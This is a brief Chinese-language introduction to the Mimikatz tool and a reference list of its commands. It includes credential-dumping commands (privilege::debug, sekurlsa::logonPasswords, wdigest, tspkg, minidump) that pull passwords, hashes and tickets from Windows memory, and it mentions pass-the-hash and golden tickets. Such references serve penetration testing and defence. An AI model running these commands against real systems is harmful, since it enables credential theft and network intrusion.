简介
Mimikatz是法国人Gentil Kiwi写的一款windows平台下的轻量级调试器,于2014年4月发起。它的功能非常强大,支持从windows进程lsass.exe 里猎取windows处于active状态账号明文密码、哈希、PIN码和Kerberos凭证,以及pass-the-hash、pass-the-ticket、build Golden tickets等数种黑客技术,还可以本地提权等操作,在内网中杀伤力很大。
命令:
- cls-----------------------------清屏
- exit----------------------------退出
- version------------查看mimikatz的版本
- system::user-----查看当前登录的系统用户
- system::computer-------查看计算机名称
- process::list------------------列出进程
- process::suspend 进程名称 -----暂停进程
- process::stop 进程名称---------结束进程
- process::modules --列出系统的核心模块及所在位置
- service::list---------------列出系统的服务
- service::remove-----------移除系统的服务
- service::start stop 服务名称--启动或停止服务
- privilege::list---------------列出权限列表
- privilege::enable--------激活一个或多个权限
- privilege::debug-----------------提升权限
- nogpo::cmd------------打开系统的cmd.exe
- nogpo::regedit -----------打开系统的注册表
- nogpo::taskmgr-------------打开任务管理器
- ts::sessions-----------------显示当前的会话
- ts::processes------显示进程和对应的pid情况等
- sekurlsa::wdigest-----获取本地用户信息及密码
- sekurlsa::tspkg------获取tspkg用户信息及密码
- sekurlsa::logonPasswords--获登陆用户信息及密码
- sekurlsa::minidump 1.dmp --对内存dump文件进行破解
- sekurlsa::logonPasswords full--破解内存中所有保存的密码